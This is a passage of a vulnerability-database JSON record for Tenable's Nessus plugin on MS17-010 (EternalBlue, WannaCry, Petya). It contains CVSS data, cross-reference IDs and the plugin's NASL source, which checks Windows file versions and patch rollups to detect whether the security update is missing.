"version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is 
Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-08-01T12:07:30", "history": [], "viewCount": 2956, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "seebug", "idList": ["SSV:92935", "SSV:92964", "SSV:92952"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0143", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "fireeye", "idList": ["FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786816", "MYHACK58:62201785331", "MYHACK58:62201786827", "MYHACK58:62201785268", "MYHACK58:62201785243", 
"MYHACK58:62201785189", "MYHACK58:62201786371"]}, {"type": "avleonov", "idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2021-08-01T12:07:30", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2021-08-01T12:07:30", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", 
value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", 
bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, 
rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-08-01T12:07:30", "differentElements": ["cvelist", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitAvailable", "exploitEase", "exploitableWith", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "76ed972eb5e867df7afdd9639e03f684", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. 
It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-11T13:59:36", "history": [], "viewCount": 2956, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", 
"MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-11T13:59:36", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-08-11T13:59:36", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n 
script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. 
